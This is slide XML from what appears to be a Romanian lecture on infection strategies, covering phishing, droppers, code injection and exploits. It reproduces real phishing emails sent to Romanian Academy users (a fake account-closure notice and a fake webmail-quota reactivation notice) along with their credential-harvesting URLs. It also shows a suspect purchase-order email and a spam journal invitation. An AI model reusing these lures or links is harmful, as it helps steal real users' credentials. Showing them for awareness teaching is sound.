                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mulțumesc,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Academia Română.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRP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975" y="2591947"/>
            <a:ext cx="3268429" cy="3268429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275935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(12)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820888" y="2519648"/>
            <a:ext cx="6096000" cy="3447098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Acad Serviciu.                                           </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dragă utilizatorule,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Am primit solicitarea dvs. de a închide acest cont </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user@acad.ro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, care se va face în curând sub ID-ul biletului: Acad-576364, save your information now</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dacă solicitarea a fost o greșeală, anulați-o rapid de sus.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vă mulțumim că folosiți serviciile noastre.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cu respect,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A ta Acad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{474AA14E-6356-9251-37AB-31F14E345DEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6787186" y="3122300"/>
            <a:ext cx="4262853" cy="2519743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07F880E3-AC0E-9E3B-C7CF-3916F1A41679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5759386" y="5966746"/>
            <a:ext cx="6094770" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://zyhuangtycooncn.myvnc.com/Webmail/webmail.php?email=paul_gagniuc@acad.ro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420335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Principalele părți ale prezentării</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1126641" y="2651209"/>
            <a:ext cx="9956042" cy="2792519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>C.12.1 Phising</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>C.12.2 Droppers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>C.12.3 Injectia de cod masina</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>C.12.4 Metode de exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2039546"/>
            <a:ext cx="3817071" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:t>C.12 Strategii de infectie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="280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135711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(13)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1950083"/>
            <a:ext cx="11184088" cy="4616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="courier new" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Stimate utilizator de webmail,</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Ați depășit cota de stocare a e-mailului. Nu vă mai puteți trimite e-mailul primit deoarece a fost impusă o restricție în contul dvs. Luați în considerare ștergerea e-mailurilor din dosarul Junk/Spam pentru a crea mai mult spațiu de stocare, după care vi se va cere să vă reactivați contul făcând clic pe linkul de verificare de mai jos</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De ce îmi va fi restricționat contul?</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Cota de stocare Mail depășită</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Posibil acces neautorizat la cont.</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Încălcări ale acordului nostru de utilizare sau ale politicii de utilizare acceptabilă.</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Avem nevoie de informații despre tine.</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Vă rugăm să verificați/validați e-mailul dvs. web prin intermediul site-ului nostru web securizat de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="courier new" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>REACTIVARE A SERVERULUI WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="courier new" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> făcând clic  pe linkul de mai jos</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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>- verificare webmail -</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iar webmail-ul dvs. va fi reactivat imediat.</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 </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Mulțumesc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="courier new" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IS&amp;T Service Birou | Serviciul de email Academia Română | Academia Română Autentificare Copyright © 2024</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4504944" y="1024390"/>
            <a:ext cx="6943344" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://khylinmica.atwebpages.com/?url=https://mail.acad.ro/v2/index.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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92911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(14)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="821055" y="2127221"/>
            <a:ext cx="4311777" cy="2337165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="821055" y="4529900"/>
            <a:ext cx="4311777" cy="1180683"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5931408" y="2310366"/>
            <a:ext cx="5626608" cy="3939540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>From:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Ionela Alexandru &lt;contact@sm-tech.ro&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Sent:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Tuesday, April 16, 2024 10:54 AM</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>To:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> undisclosed-recipients:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Subject:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> comandă de achiziție</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>To this end, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Am încercat să vă contactez Office Phone pe baza conversației noastre cu reprezentantul de vânzări al companiei dvs., dar nu am primit niciun răspuns. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this situation, you will be able to reach the desired level of achiziție (anexată) furnizată de colegul dvs. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pentru articolele solicitate, vă rugăm să ne furnizați confirmarea dvs. la Data Livrării., </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>De asemenea, dorim să întrebăm despre următoarele: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>* Timpul de livrare a produsului </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>* Garantia produsului </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>* Cantitatea minima pentru comanda </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>* Condiții de plată disponibile. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There is no need for feedback.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Flowchart: Process 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435864" y="1943099"/>
            <a:ext cx="4989576"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9" name="Flowchart: Process 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5687568" y="1943099"/>
            <a:ext cx="6028944"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6184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(15)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528340" y="1958697"/>
            <a:ext cx="11005292" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dear Gagniuc Paul A‍ ,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Good day. I hope this mail finds you well.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On behalf of our Editorial Board, we warmly invite you to submit your research to the next issue Volume 10 Issue 1 of Journal of Obesity and Overweight [2455-7633].</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JOO is an online worldwide peer-reviewed, open-access journal that aims to highlight challenges and breakthroughs in Obesity and Overweight. The journal is highly cited and is indexed and abstracted by J-gate, Google Scholar, cross ref, root indexing, SIS (Scientific Indexing Services), ISI (International Scientific Indexing), DRJI, WorldCat, SciLit, and Genamics.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For complete information, kindly visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Journal Website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We hope that your paper will provide us with information about your study, educate the audience, spark new ideas, and generate an outstanding issue. We kindly encourage you to submit your excellent work to our upcoming issue for publication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We would be happy to provide any further information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Best Regards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Francis Barin | Editorial Assistant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Journal of Obesity and Overweight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> #9587 Nittany, Dr Apt 103</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Manassas, Virginia 20110, USA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unsubscribe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to no longer receive emails from us. | Having trouble reading this email? Click here. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4084320" y="764739"/>
            <a:ext cx="7449312" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
